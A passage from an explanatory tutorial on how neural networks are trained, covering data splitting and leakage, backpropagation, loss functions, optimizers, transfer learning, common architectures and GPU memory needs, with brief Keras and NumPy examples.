finishes calculating the gradients for the batch $N$, Batch $N+1$ instantly floods into VRAM. The GPU never waits, the Tensor Cores never idle, and the hardware is pushed to its absolute physical limit.\n6. Dataset Splitting: The Scientific Method A neural network is, at its core, a high-capacity memorization engine. If it is evaluated on the exact same matrices it used to calculate its gradients, it will report near-perfect accuracy simply because it mapped the precise topography of those specific data points. To scientifically prove that the mathematical mapping actually generalizes to unseen reality, the raw data must be physically quarantined into three distinct silos before any preprocessing begins.\nThe Training Set (80%): The only data that physically alters the model. This data is pushed through the forward pass, generates the error signal, and drives the backpropagation algorithm to update the weights. The Validation Set (10%): The tuning gauge. 
At the end of every training epoch, this data is passed through the network with backpropagation strictly disabled. It generates a validation loss metric. This metric dictates when to adjust hyperparameters or when to halt the training loop entirely (Early Stopping), because the model has stopped learning general patterns and has started memorizing the training set. The Test Set (10%): This data is entirely stripped from the pipeline and held on disk until the training and tuning processes are 100% complete. It is run through the static, finalized weights exactly once. The resulting metric is the only mathematically valid representation of how the model will perform in the wild. NOTE: In deep learning, where datasets often contain tens of millions of records, these percentages often shift to 98% / 1% / 1%, since a 1% slice of a 500GB dataset is still statistically significant enough to validate against.\nData Leakage The quarantine of the validation and test sets must be absolute. If mathematical information from the test set bleeds into the training set, the integrity of the entire training run is destroyed. This is called data leakage. It guarantees that a model will output phenomenal metrics during testing, but catastrophically fail the moment it is deployed. At least it might.\nThe most common vector for data leakage occurs during preprocessing, specifically feature scaling.\nIf a dataset requires Standardization ($z = \\frac{x - \\mu}{\\sigma}$), the mean ($\\mu$) and standard deviation ($\\sigma$) must be calculated. Calculating the mean and standard deviation across the entire raw dataset before executing the physical train/test split is one way this can occur.\nIf this happens, the extreme outliers and the statistical distribution of the test set are permanently baked into the $\\mu$ and $\\sigma$ variables. When those variables are used to scale the training tensors, the training data is mathematically influenced by the test data. The model implicitly \u0026ldquo;sees\u0026rdquo; the future. The optimizer learns the topography of the test set without ever formally processing it.\nTo maintain mathematical integrity, the physical split must happen first. The mean and standard deviation are calculated exclusively from the isolated training subset. Those exact, static training variables are then saved to the disk and applied to scale the validation set, the test set, and eventually, the live production data.\nUnder the Hood The data pipeline has done its job. A perfectly formatted, mathematically scaled batch of tensors is now sitting in the GPU’s pinned memory. The hardware is ready. Now, we execute the mathematical operations that actually force a model to learn.\n1. The Forward Pass: Execution and State The forward pass is the physical execution of data moving through the network\u0026rsquo;s architecture to generate a prediction. It is a strictly sequential, highly parallelized chain of linear algebra.\nThe Matrix Cascade When a batch of data enters the first hidden layer, the GPU\u0026rsquo;s Tensor Cores spin up to execute a massive Matrix Multiply-Accumulate (MMA) operation. The hardware takes the entire input tensor ($X$) and calculates the dot product against the layer\u0026rsquo;s entire weight matrix ($W$), followed immediately by the addition of the bias vector ($b$).\nThe raw mathematical output of this layer is: $Z = X \\cdot W + b$\nHowever, as established, this raw output $Z$ is purely linear. 
Before this data can move to the next layer, it must be passed through a non-linear activation function like ReLU. The GPU processes the $Z$ tensor, snapping all negative numbers to zero: $A = \\max(0, Z)$\nThis resulting tensor, $A$, is called the activation. This activation tensor immediately becomes the input $X$ for the next hidden layer, triggering the next MMA operation.\nThis creates a cascade. The tensors flow from layer to layer, undergoing continuous mathematical transformations: multiply, add, snap to zero, repeat until the final layer compresses the data down into a single prediction tensor.\nCaching the Activations If we were only running inference (just asking the model for a prediction), the GPU would ruthlessly delete each layer\u0026rsquo;s activation tensor from VRAM the exact millisecond the next layer finished computing. Memory is cleared instantly to make room for the next batch.\nDuring training, doing this breaks the laws of calculus or at least the ability to use the equations for backpropagation.\nAs the GPU calculates the output of every single hidden layer, it must actively cache those intermediate $A$ and $Z$ tensors in VRAM. The forward pass is not just about getting the final prediction; it is about building the mathematical state required for learning.\nWhen we eventually reach the backpropagation phase, the network will need to compute the gradient (the error) of each weight. According to the chain rule of calculus, you cannot calculate the partial derivative of a weight without knowing the exact input value that was multiplied against it. If the GPU drops those intermediate activations to save memory, the backward pass cannot be computed, and the network cannot learn.\nThis is the exact reason why training a model requires more VRAM than running one exponentially. The forward pass leaves a massive, uncompressed trail of cached matrices that consume gigabytes of memory, sitting idle and waiting for the backward pass to use them.\n2. Loss Functions The forward pass terminates by outputting a final prediction tensor. At this exact moment, the network has no concept of whether it succeeded or failed. The GPU simply holds a matrix of floating-point numbers. To force the network to learn, we must introduce a strictly mathematical way to quantify how badly that prediction deviated from the true label.\nThis calculation is the loss function. It compresses the entire network\u0026rsquo;s performance for that specific batch into a single scalar value.\nMean Squared Error (MSE) for Regression When building a model to predict continuous numerical values, such as the price of a house or the temperature of a machine, the industry standard is Mean Squared Error.\nThe equation calculates the difference between the true label ($y$) and the model\u0026rsquo;s prediction ($\\hat{y}$): $$L = \\frac{1}{n}\\sum(y - \\hat{y})^2$$The hardware subtracts the prediction from the reality, squares the result, and averages it across the entire batch ($n$).\nWhy do we square it instead of just taking the absolute difference? Two mathematical reasons. First, squaring the number aggressively penalizes massive failures. If the model misses by 1 unit, the error is 1. If it misses by 10 units, the error is not 10 times worse; it is 100 times worse. This extreme penalty generates a massive error signal, forcing the optimizer to prioritize fixing catastrophic outliers rather than gently tweaking minor inaccuracies.\nSecond, squaring any number guarantees a positive output. 
When plotted across the parameter space, this mathematically forces the loss landscape into a clean, convex parabola.\nThis \u0026ldquo;bowl\u0026rdquo; shape is critical. It ensures that no matter where the optimizer currently sits on the slope, there is a smooth, continuous, predictable downward gradient pointing directly toward the mathematical minimum.\nCross-Entropy for Classification If you are building a classification model predicting whether an image is a dog or a cat MSE physically breaks down.\nClassification models output probability distributions (e.g., an 85% chance it is a dog). Because probabilities are strictly bounded between 0 and 1, the maximum possible error an MSE function could calculate is exactly 1. If a model is 99.9% confident an image is a dog, but it is actually a cat, MSE sees a maximum error of 1 and generates a very weak, unurgent gradient. The model learns almost nothing from being confidently wrong.\nTo fix this, classification relies on Cross-Entropy loss: $$L = -\\sum y \\log(\\hat{y})$$This equation abandons simple subtraction and introduces the natural logarithm. If the true label $y$ is 1 (it is a cat), and the model predicts a probability $\\hat{y}$ of only 0.01, the math evaluates $-\\log(0.01)$.\nLook at the curve of a negative logarithm. As the prediction ($\\hat{y}$) approaches 0 for a true class, the loss does not stop at 1 it shoots exponentially toward infinity. Cross-entropy mathematically ensures that if a model is confidently, entirely wrong, it suffers an astronomically high penalty. This massive numerical shock translates directly into a massive gradient, violently ripping the weights out of their incorrect configuration during the next step.\n3. Backpropagation The forward pass generated a prediction, and the loss function compressed the failure of that prediction into a single scalar number. Now we face the central mathematical hurdle of deep learning: how do you distribute the blame for that single error value across a matrix of billions of individual parameters?\nEvery weight in the network is essentially a physical knob. For a given setting of these millions of knobs, the GPU executes the forward pass and calculates the error. If we just randomly tweaked these parameter knobs to see if the error decreased, we would be relying on a mathematically blind \u0026ldquo;random perturbation\u0026rdquo; method that would take millennia to converge. To know exactly how much to adjust a specific weight in layer 1 based on an error calculated in layer 100, we need backpropagation.\nThe Gradient Vector To physically adjust a weight, the hardware needs a specific set of instructions. It needs a gradient. A gradient is simply a vector of partial derivatives. For every single parameter in the network, we must calculate the partial derivative of the Total Loss ($L$) with respect to that specific weight ($w$).\nThe math is written as: $$\\frac{\\partial L}{\\partial w}$$ Conceptually, this partial derivative answers a single question: If I nudge this specific weight up by a microscopic fraction, exactly how much does the total error change? This pipeline exploits differentiability to calculate the instantaneous rate of change, or the exact mathematical steepness, of the loss function for any specific weight. 
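A minimal sketch of that question, assuming PyTorch: nudge one weight by a tiny epsilon and re-measure the loss, then compare against the derivative autograd reports for the same weight:

```python
import torch

torch.manual_seed(0)
x = torch.randn(4, 3)  # a tiny batch of inputs
y = torch.randn(4, 1)  # true labels
w = torch.randn(3, 1, requires_grad=True)

def loss_fn(weights):
    return ((x @ weights - y) ** 2).mean()  # mean squared error

# Backpropagation's answer: dL/dw for every weight at once.
loss = loss_fn(w)
loss.backward()
print(w.grad[0, 0])  # the slope attached to the first weight

# The literal nudge: bump that one weight by a tiny epsilon and re-measure.
eps = 1e-4
w_nudged = w.detach().clone()
w_nudged[0, 0] += eps
print((loss_fn(w_nudged) - loss.detach()) / eps)  # approximately the same number
```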
This effectively installs a theoretical prediction next to every single parameter in VRAM, explicitly telling the optimizer the exact direction and magnitude required to physically reduce the error.\nWhen the hardware calculates this derivative for every weight and aggregates them, it yields a vector that mathematically points in the direction of the steepest ascent. It points directly toward maximum error. To fix the model, the optimizer will eventually subtract this gradient to move down the slope toward the minimum error.\nThe Computational Graph and Interlocking Math Calculating $\\frac{\\partial L}{\\partial w}$ for the very last layer of the network is easy because those weights are directly connected to the loss function. But you cannot directly calculate the derivative of the loss with respect to a weight in the very first layer. That weight\u0026rsquo;s influence has been mathematically warped by 99 subsequent layers of matrix multiplications and non-linear activation functions.\nTo solve this, the network must be physically broken down into a computational graph of primitive, easily differentiable operations (like matrix addition and multiplication).\nThe GPU then connects these operations using the chain rule of calculus. We break the massive, impossible derivative into a chain of smaller, easily calculable local derivatives. Conceptually, the chain rule states that the error of a specific weight depends on the error of its activation, which depends on the error of the subsequent layer\u0026rsquo;s input, which eventually depends on the final loss function. You can visualize the chain rule as a massive sequence of interlocking physical cogwheels.\nWhen the optimizer nudges the first wheel (an input parameter), it physically forces a calculable rotation in the next wheel, which eventually drives the final output wheel. The exact mathematical amplitude of that final change is computed by sequentially chaining the local derivatives of every individual wheel together.\nExecution: The Forward and Backward Cascade The training loop executes this computational graph in two distinct, hardware-intensive phases. This is where the physical reality of the VRAM cache becomes critical.\n1. The Forward Step The data tensors are physically pushed from left to right through the computational graph. The GPU executes the math at each individual node, aggressively caching the intermediate numerical states (the activations) in VRAM, until it outputs the final prediction and the Total Loss scalar. To calculate the local derivative of an activation function later (like finding the slope of ReLU), the GPU must know the exact input number that originally passed through it.\n2. The Backward Step The sequence of calculations is mechanically unrolled in reverse order. The hardware takes that final error scalar and cascades it backward. Because every node in the graph is a primitive, known operation, the GPU simply applies hardcoded local derivative rules to the recalled VRAM tensors.\nAddition Nodes: An addition node acts as a physical router. It takes the incoming downstream gradient and simply copies it equally to the mathematical paths that originally fed into it. Multiplication Nodes: A multiplication node distributes the gradient crossways. It multiplies the incoming downstream gradient by the physically cached numerical value of the opposite incoming node. 
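A minimal worked example of those two local rules on a toy graph, $L = (a \cdot b) + c$, with plain Python numbers:

```python
a, b, c = 2.0, -3.0, 5.0

# Forward step: compute and cache the intermediate values.
m = a * b  # multiplication node (cache a and b)
L = m + c  # addition node

# Backward step: start with dL/dL = 1 and apply the local rules in reverse.
dL = 1.0
dm = dL * 1.0  # addition node: copy the incoming gradient to each input path
dc = dL * 1.0
da = dm * b    # multiplication node: gradient times the *other* cached input
db = dm * a

print(da, db, dc)  # -3.0  2.0  1.0
```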
As the Tensor Cores multiply this incoming global error by the local derivative of the cached activations, the operation instantly yields two new gradients:\nThe specific error value for the weights in that layer (so they can be updated). The remaining error value to be passed backward to the preceding layer. Layer by layer, the hardware physically multiplies the derivatives backward through the computational graph. By the time the cascade reaches the input layer, the chain rule has successfully mapped the global loss function back through the entire architecture. Every single weight parameter has been assigned its own precise mathematical error value.\nThe optimizer then executes a microscopic parameter nudge dictated by the learning rate ($\\alpha$), the unneeded VRAM caches are cleared, and the entire forward-backward-nudge loop repeats.\n4. Optimization Algorithms: The Engine of Descent Backpropagation calculates the error. It successfully maps the partial derivative of the loss function to every single parameter in the network. But backpropagation does not actually change the model. It simply finds the mathematical slope.\nThe optimizer is the engine that takes those gradients and physically alters the weights sitting in VRAM to drive the error down.\nGradient Descent At the core of every modern neural network is the Gradient Descent algorithm. The fundamental operation executed by the hardware for every single parameter is: $$w_{new} = w_{old} - \\alpha \\nabla L$$Breaking the equation down:\n$\\nabla L$: The gradient vector calculated by backpropagation. As established, this mathematically points up the error hill toward the steepest ascent. Subtraction: Because the gradient points toward maximum error, we must subtract it from our current weight ($w_{old}$) to force the optimizer to travel in the exact opposite direction, down the slope toward the minimum loss. The Learning Rate ($\\alpha$): This is the single most critical hyperparameter in deep learning. The gradient tells you the direction, but the learning rate dictates the physical size of the step. If $\\alpha$ is too large, the weight update is so violent that it overshoots the minimum entirely, bouncing up the opposite wall of the loss ravine until the numbers explode into NaNs. If $\\alpha$ is too small, the GPU will spend months making microscopic adjustments, often getting permanently trapped in the first shallow depression (a local minimum) it encounters.\nBatching Strategies How often should the optimizer execute this $w_{new}$ equation?\nStochastic Gradient Descent (SGD): This means updating the weights after processing a single data point (batch size 1). Mathematically, the gradient is wildly erratic because the optimizer is reacting to the noise of individual samples. You are also using a massively parallel GPU to compute a single vector, leaving 99% of your Tensor Cores idling and bottlenecking the entire system on memory latency. Full Batch Gradient Descent: This involves calculating the gradient for the entire 500GB dataset before executing a single weight update. Mathematically, this is flawless; it calculates the true, perfect gradient of the entire data manifold. Physically, it is impossible: you cannot fit the activations of a 500GB dataset into VRAM to run backpropagation. Mini-Batch: The industry standard. Process chunks of data (e.g., batch size 32, 128, or 256). This provides a mathematically stable approximation of the true gradient. 
More importantly, batch sizes are specifically chosen in multiples of 8, 32, or 64 to perfectly align with the physical architecture of the GPU\u0026rsquo;s memory controllers, maximizing memory bandwidth and fully saturating the compute cores. Modern Optimizers Standard Gradient Descent is naive. It only looks at the exact slope of the current step. If the optimizer enters a flat ravine where the gradient approaches zero, the weight updates shrink to zero, and the model stops learning entirely.\nTo solve this, we alter the engine.\nMomentum: Instead of only using the current gradient, the optimizer calculates a moving average of past gradients. If the optimizer has been moving rapidly down a slope for 100 steps, it builds \u0026ldquo;speed.\u0026rdquo; If it suddenly hits a tiny mathematical bump (a local minimum) where the gradient briefly points backward, the accumulated momentum overpowers the bump and carries the optimizer through it, allowing it to traverse flat areas vastly faster. Adam (Adaptive Moment Estimation): Adam is the undisputed default for 95% of deep learning because it solves a massive architectural flaw in standard Gradient Descent. Basic SGD uses one global Learning Rate ($\\alpha$) for all 70 billion parameters in a model. Adam abandons this. It merges Momentum (the first moment) with RMSprop (the second moment, which tracks variance). Instead of applying a blanket $\\alpha$ across the entire network, Adam dynamically calculates a custom, adaptive learning rate for every single weight independently. If a specific weight has been bouncing erratically with high variance, Adam automatically shrinks that specific parameter\u0026rsquo;s learning rate to stabilize it. If a weight has been smoothly coasting in one direction, Adam accelerates it. It completely decentralizes the learning rate, turning one massive optimization problem into billions of individually tuned micro-descents.\nNOTE: Adam helps speed up the first part of the training process by taking larger leaps and bounds but when it comes to the more micro adjustments it takes smaller steps allowing for the fine tuning.\nTraining Methodologies \u0026amp; Architectures 1. Training Methodologies: The Source of the Error Signal The entire learning process is driven by the loss function. The optimizer requires an error signal to calculate the gradients. The fundamental difference between training methodologies comes down to a single question: where does that error signal come from?\nSupervised Learning Supervised learning is the brute-force approach to machine learning.\nThe Mathematical Definition: To calculate the loss, the hardware requires two separate tensors to be loaded into VRAM simultaneously: the input data $X$ and a discrete, external label $y$. The network executes the forward pass to generate a prediction $\\hat{y}$, and the loss function calculates the exact mathematical delta between $\\hat{y}$ and $y$. The Physical Bottleneck: The $y$ tensor does not magically exist. For supervised learning to work, humans must manually classify, tag, and construct the $y$ tensor for millions of rows of data. This creates a massive physical and economic bottleneck. Furthermore, the loss function is completely blind to reality; it only sees the tensor. If a tired human annotator mislabels an image of a dog as a cat, the math treats that human error as absolute ground truth. The optimizer will violently adjust the network\u0026rsquo;s weights to perfectly replicate that human mistake. 
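Pulling the forward pass, the loss, backpropagation, and the optimizer together, here is a minimal sketch of one supervised training step, assuming PyTorch; the sizes are illustrative, and note that the loss only ever compares the prediction against the $y$ tensor, whatever that label happens to say:

```python
import torch
import torch.nn as nn

model = nn.Sequential(nn.Linear(20, 64), nn.ReLU(), nn.Linear(64, 2))
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
loss_fn = nn.CrossEntropyLoss()

X = torch.randn(32, 20)         # a mini-batch of inputs
y = torch.randint(0, 2, (32,))  # human-provided labels, right or wrong

y_hat = model(X)       # forward pass (activations cached for the backward pass)
loss = loss_fn(y_hat, y)  # scalar error, measured strictly against the labels
optimizer.zero_grad()
loss.backward()        # backpropagation: a gradient for every weight
optimizer.step()       # Adam nudges the weights sitting in VRAM
```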
Training Methodologies & Architectures 1. Training Methodologies: The Source of the Error Signal The entire learning process is driven by the loss function. The optimizer requires an error signal to calculate the gradients. The fundamental difference between training methodologies comes down to a single question: where does that error signal come from?
Supervised Learning Supervised learning is the brute-force approach to machine learning.
The Mathematical Definition: To calculate the loss, the hardware requires two separate tensors to be loaded into VRAM simultaneously: the input data $X$ and a discrete, external label $y$. The network executes the forward pass to generate a prediction $\hat{y}$, and the loss function calculates the exact mathematical delta between $\hat{y}$ and $y$. The Physical Bottleneck: The $y$ tensor does not magically exist. For supervised learning to work, humans must manually classify, tag, and construct the $y$ tensor for millions of rows of data. This creates a massive physical and economic bottleneck. Furthermore, the loss function is completely blind to reality; it only sees the tensor. If a tired human annotator mislabels an image of a dog as a cat, the math treats that human error as absolute ground truth. The optimizer will violently adjust the network's weights to perfectly replicate that human mistake. The network does not optimize for reality; it optimizes for the label (and for however well or poorly underpaid human annotators produced those labels), not for the best possible model output. Unsupervised Learning (Finding the Manifold) Human labeling is too expensive, so how do you calculate an error gradient without a $y$ tensor? You hack the math. You use the raw input data itself as the label, setting $y = X$.
Autoencoders: This is the foundational architecture for unsupervised representation learning. The Architecture (Encoder and Decoder): Instead of a standard feedforward shape, an Autoencoder is built like an hourglass. The first half of the network is the Encoder. It takes a massive, high-dimensional input tensor (like a high-resolution image) and forces it through successively smaller hidden layers. This physically crushes the data down into a tiny, low-dimensional vector known as the "latent space" or the bottleneck. The second half of the network is the Decoder. It takes the compressed latent vector and uses expanding hidden layers to reconstruct the original high-resolution input from scratch. The Loss: The loss function is simply the Mean Squared Error between the raw input tensor $X$ and the reconstructed output tensor $\hat{X}$. To drive this error down, backpropagation physically forces the Encoder's weights to discover the absolute most efficient mathematical compression of the data. It forces the network to map the hidden, underlying structure (the manifold) of the dataset, automatically separating critical features from useless noise, all without a single human-generated label. 2. Transfer Learning & Fine-Tuning Training a deep architecture from scratch is an exercise in brute-force computation. It requires massive, highly variance-rich datasets and weeks of continuous GPU cycles to force the optimizer to slowly build feature representations from random noise. Transfer learning bypasses this mathematical grind entirely by hijacking the feature representations of pre-trained models and bending them to a new task.
The Mechanics of Weight Freezing When you download a model trained on millions of generic images, the lower hidden layers have already mathematically converged on how to detect universal features like edges, curves, and textures. To preserve this, you must physically intervene in the training loop.
At the hardware level, you sever the lower layers of the model from the computational graph. You do this by explicitly disabling gradient tracking for those specific parameters (for example, setting requires_grad = False in PyTorch, or layer.trainable = False in Keras). When the framework constructs the backward pass, it completely ignores these frozen matrices.
VRAM Savings This mechanical severing creates a massive hardware advantage. As established in the forward pass mechanics, a network normally must hoard gigabytes of intermediate activation tensors in VRAM so the chain rule can calculate local derivatives later.
Because the lower layers are now frozen, the GPU explicitly knows it will not need to calculate their gradients. Therefore, the GPU does not need to cache their intermediate activations during the forward pass, and the backpropagation cascade physically halts before reaching them. By simply flipping that gradient-tracking flag, you can slash the VRAM requirements of the training loop by up to 80%, allowing you to train massive enterprise-grade models on consumer hardware.
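In Keras terms, the flag flip looks roughly like this. This is a sketch, not a prescription: the choice of MobileNetV2 is purely illustrative, and the small replacement head anticipates the head-replacement step described in the next section.

import tensorflow as tf
from tensorflow.keras import layers, models

# Load a generic pre-trained convolutional base (illustrative choice)
base = tf.keras.applications.MobileNetV2(include_top=False, input_shape=(224, 224, 3))

# Freeze it: no gradients, no optimizer states, and its intermediate
# activations no longer need to be cached for the backward pass
base.trainable = False

# Stack a small trainable head on top of the frozen feature extractor
model = models.Sequential([
    base,
    layers.GlobalAveragePooling2D(),
    layers.Dense(2, activation='softmax'),   # new task-specific output
])

model.summary()  # the bulk of the parameters now show up under "Non-trainable params"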
Freezing is not quite the same trick as quantization, but it has a similar memory-saving effect, applied to the training loop instead of inference.
Head Replacement and Fine-Tuning A pre-trained model is hardwired to output, for example, 1,000 specific classes. If you are building a binary classifier for factory defect detection, that architecture is useless. You must perform head replacement.
You literally delete the pre-trained model's final Output Layer (the "head") and graft a new, randomly initialized matrix onto the end of the network, explicitly shaped for your data (e.g., a 2-class output).
When you initialize the training loop, you configure the optimizer with a microscopic learning rate ($\alpha$). Because the new head is random noise, it will initially generate massive errors. If your learning rate is too high, the resulting violent gradients will propagate backward and mathematically destroy the delicate, pre-learned feature representations in any unfrozen deeper layers. A microscopic learning rate ensures the optimizer strictly trains the chaotic new head while making only tiny, non-destructive adjustments to the deeper representations.
3. Core Architectures You cannot use the same network architecture for every problem. The physical structure of your raw data must dictate the structure of the matrix multiplications executing on the GPU. If you force spatial data or time-series data into the wrong mathematical framework, you will either completely exhaust your VRAM or mathematically obliterate the inherent patterns in the data before the optimizer even sees them.
Multilayer Perceptrons (MLPs) The Multilayer Perceptron is the standard, fully connected neural network. Its defining physical characteristic is dense connectivity: every single neuron in Layer A has a dedicated weight connecting it to every single neuron in Layer B.
This architecture is perfectly suited for flat, tabular data (e.g., a CSV file predicting house prices based on isolated features such as square footage, zip code, and age). However, the moment you apply an MLP to high-dimensional spatial data, you encounter the VRAM scaling problem.
In an MLP, the number of weights scales quadratically ($O(n^2)$). Imagine feeding a flat, grayscale 1-megapixel image into the network. That image is an input tensor of 1,000,000 individual pixels. If your first hidden layer contains just 1,000 neurons, the GPU must calculate a unique weight for every pixel-to-neuron connection.
$1,000,000 \text{ inputs} \times 1,000 \text{ neurons} = 1,000,000,000 \text{ parameters}$
That is 1 billion parameters for a single, mathematically shallow hidden layer. Storing that weight matrix and its associated optimizer states would consume gigabytes of VRAM. Furthermore, by flattening the 2D image into a 1D line to feed the MLP, you physically destroy the spatial relationships between the pixels. It is physically and mathematically impossible to scale MLPs for modern computer vision.
Convolutional Neural Networks (CNNs) To process spatial data, the architecture must abandon dense connections. Instead of connecting every pixel to a neuron, CNNs use localized, sliding weight matrices called "kernels" or "filters."
The Convolution Operation: A kernel is just a tiny matrix, typically 3x3 or 5x5. The GPU applies this 3x3 kernel by physically sliding it across the image tensor, computing a localized dot product at each step.
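A naive NumPy version of that sliding dot product (ignoring padding, stride, and channels for clarity) looks like this:

import numpy as np

def conv2d_naive(image, kernel):
    """Slide a small kernel over a 2D image, taking a dot product at each position."""
    kh, kw = kernel.shape
    out_h = image.shape[0] - kh + 1
    out_w = image.shape[1] - kw + 1
    out = np.zeros((out_h, out_w))
    for i in range(out_h):
        for j in range(out_w):
            patch = image[i:i + kh, j:j + kw]      # the local 3x3 (or 5x5) neighborhood
            out[i, j] = np.sum(patch * kernel)     # localized dot product
    return out

# Example: a 3x3 vertical-edge detector applied to a random 8x8 "image"
edge_kernel = np.array([[1, 0, -1],
                        [1, 0, -1],
                        [1, 0, -1]])
feature_map = conv2d_naive(np.random.rand(8, 8), edge_kernel)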
Instead of looking at the entire image at once, the math forces the network to examine small, overlapping 9-pixel chunks, preserving 2D spatial relationships.\nWeight Sharing: This is where the VRAM savings occur. The exact same 3x3 kernel slides across the entire image. To detect a vertical edge in the top-left corner, the GPU uses the same 9 parameters it uses to detect one in the bottom-right corner. By sharing these weights across the spatial dimensions, the GPU only has to store and update 9 parameters (plus 1 bias) instead of 1 billion. This slashes the parameter count by orders of magnitude while drastically improving the mathematical detection of features. Pooling: As a CNN gets deeper, it generates dozens of \u0026ldquo;feature maps\u0026rdquo; (outputs of the kernels). If left unchecked, these cached activations will bloat VRAM during the forward pass. To fix this, CNNs use pooling layers to mathematically downsample the tensors. A max-pooling layer takes a 2x2 grid of the tensor and simply outputs the maximum value, discarding the rest. This violently shrinks the physical size of the intermediate activations by 75% at each step, slashing the VRAM footprint and allowing the network to grow deeper without crashing the hardware. Recurrent Neural Networks (RNNs) and LSTMs CNNs and MLPs expect input tensors with strict, fixed physical shapes. Time-series data—like an audio waveform, a sequence of stock prices, or a sentence of text—is dynamic. It varies in length, and understanding the current data point requires mathematical memory of the past.\nThe Hidden State: Standard feedforward networks process Batch 1, delete it from memory, and move to Batch 2. RNNs introduce a feedback loop. When processing sequential data, the RNN calculates the output of the network at Time Step 1 ($t_1$). When Time Step 2 ($t_2$) arrives, the RNN physically concatenates the new input tensor with the hidden state output from $t_1$. The network literally feeds its own past mathematical calculations into its current dot product. Backpropagation Through Time (BPTT): This feedback loop creates a massive hardware bottleneck during training. To calculate gradients for an RNN, the GPU cannot just look at the current layer. It must mathematically \u0026ldquo;unroll\u0026rdquo; the entire sequence loop in memory. If you feed the network a sequence of 1,000 time steps, the GPU must cache 1,000 sequential activation states in VRAM. The backward pass must then cascade back through all 1,000 steps to calculate the exact origin of the error.\nThe Vanishing Gradient and LSTMs: BPTT exposes a fatal mathematical flaw in standard RNNs. As the gradient is multiplied backward through hundreds of unrolled time steps, the repeated multiplication of values less than 1 causes the gradient to shrink exponentially. Within a few steps, the gradient vanishes to zero. The network mathematically forgets early inputs because the error signal physically cannot reach them. Long Short-Term Memory (LSTM) networks solve this structural flaw by abandoning the simple feedback loop and introducing explicit, physical gates. 
LSTMs use Sigmoid (squashing values between 0 and 1) and tanh (squashing values between -1 and 1) activation functions to implement a "Forget Gate," an "Input Gate," and an "Output Gate."
These gates mathematically dictate exactly what information is allowed to enter a protected "Cell State." This Cell State acts as a frictionless, uninterrupted mathematical highway running straight through the time steps, allowing gradients to flow backward through thousands of sequential inputs without vanishing, thereby solving the vanishing-gradient problem and enabling the network to retain long-term context.
Implementation This section is not done and I will be filling it out more. I asked the AI to fill out some of the code blocks for the current state, so I am not sure how relevant they are, but they are put in there to give some examples. I plan on doing a fuller section on implementation once I have a better idea of how it can be used for smaller use cases.
1. The Infrastructure of Training The required compute is determined entirely by two variables: the model's total parameter count and the specific training methodology you use. You cannot code your way out of a physical VRAM bottleneck.
Small-Scale Architectures (Millions of Parameters) When training networks with tens or hundreds of millions of parameters from scratch, the mathematical requirements fit comfortably within standard, discrete compute environments.
The VRAM Requirement: The hard limit for this tier is typically between 16GB and 24GB of VRAM. This is enough physical memory to store the model's weights, cache intermediate forward-pass activations, and hold the optimizer states (such as Adam's momentum trackers). The PCIe Bottleneck: At this scale, raw compute speed is rarely the primary point of failure. The bottleneck is the PCIe bus. If your CPU and standard SSD cannot fetch, decode, and push data across the motherboard fast enough, the GPU's massive parallel compute cores will simply sit idle. Unified Memory: Modern systems utilizing a Unified Memory architecture completely bypass this latency. By physically allowing the CPU and GPU to share a single, massive pool of high-bandwidth memory, the hardware avoids shuttling tensors back and forth across a motherboard slot. It trades the absolute highest raw Matrix Multiply-Accumulate speed for massive, uninterrupted memory capacity, allowing seamless local processing.
Large-Scale Architectures (Billions of Parameters) When you scale up to modern Large Language Models (LLMs) possessing billions of parameters, the physical reality of the math changes completely.
The HBM Requirement: If you attempt to run a full backpropagation loop on a 7-billion-parameter model with 24GB of VRAM, the script will crash immediately. The optimizer states alone for a model of that size require massive memory pools (Adam tracks two extra values per parameter, typically in full precision). To train these from scratch, you need chips equipped with 40GB to 80GB+ of High Bandwidth Memory (HBM) stacked directly on the silicon die. The Storage Starvation: At this massive scale, the speed at which you can calculate gradients outpaces the speed of standard storage. If you are operating on a virtualized cloud instance and attach a cheap, low-IOPS network drive, the CPU will spend all its time waiting for data packets to arrive over the datacenter's Ethernet. The compute engine will starve.
Training at this scale requires explicitly provisioning high-throughput NVMe block storage to ensure the data pipeline can keep the cores saturated at 100% utilization. Multi-GPU and Distributed Training When a model scales to tens or hundreds of billions of parameters, its mathematical state cannot physically fit into even a single 80GB VRAM pool. The calculus must be violently split across multiple GPUs.\nThere are two primary ways to distribute this workload:\nPipeline Parallelism: The model is sliced horizontally. GPU 1 holds layers 1-10, while GPU 2 holds layers 11-20. GPU 1 processes the forward pass, sends the cached activations across the wire to GPU 2, and then goes completely idle while GPU 2 works. It is structurally easier to program but highly inefficient due to catastrophic hardware idling. Tensor Parallelism: The model is sliced vertically. The actual matrix multiplications for a single layer are mathematically decomposed, computed simultaneously across multiple GPUs, and the resulting tensors are summed before moving to the next layer. Tensor parallelism keeps all GPUs saturated at 100% utilization, but it introduces a massive communication penalty. The GPUs must sync their math after every single layer. A standard PCIe connection is far too narrow and slow to handle this cross-talk. To execute tensor parallelism effectively, the GPUs must be physically bridged by proprietary hardware interconnects (such as NVIDIA\u0026rsquo;s NVLink), which provide a dedicated, high-bandwidth highway directly between the chips, bypassing the CPU and motherboard entirely.\nParameter-Efficient Fine-Tuning (PEFT) How do you train a massive, billion-parameter model if you only have a consumer GPU and cannot afford an NVLink cluster? You change the training methodology.\nYou cannot train a 7B model from scratch on 24GB of VRAM, but you can fine-tune one using techniques like Low-Rank Adaptation (LoRA).\nInstead of updating all 7 billion parameters, LoRA physically freezes the massive, pre-trained weight matrices. The framework explicitly disables gradient tracking for the base model, severing it from the backward pass. It then injects tiny, randomly initialized \u0026ldquo;low-rank\u0026rdquo; matrices alongside the frozen weights. During backpropagation, the GPU only calculates gradients and updates the optimizer states for these microscopic new matrices.\nBy altering the mathematical method, you slash the VRAM requirements by up to 90%. This physical hack allows you to load massive enterprise-grade architectures into standard memory pools and train them at high speeds without crashing the hardware.\n2. Keras Sequential API Focus This is the highest level of abstraction. It is fast and simple, but mathematically rigid.\nThe Architecture Building a model is accomplished by simply passing a Python list of layer objects to tf.keras.Sequential(). It is the easiest way to construct a neural network, provided that each layer connects to exactly one input tensor and one output tensor.\nUnder the Hood TensorFlow automatically handles the tensor routing. You do not need to explicitly define the input shape for every hidden layer; you only specify it for the very first layer so the framework knows the dimensions of the incoming data. From there, the framework automatically calculates the required matrix transformations mathematically based on the previous layer\u0026rsquo;s output shape.\nThe Levers Here is the exact code required to build a basic 3-layer architecture. 
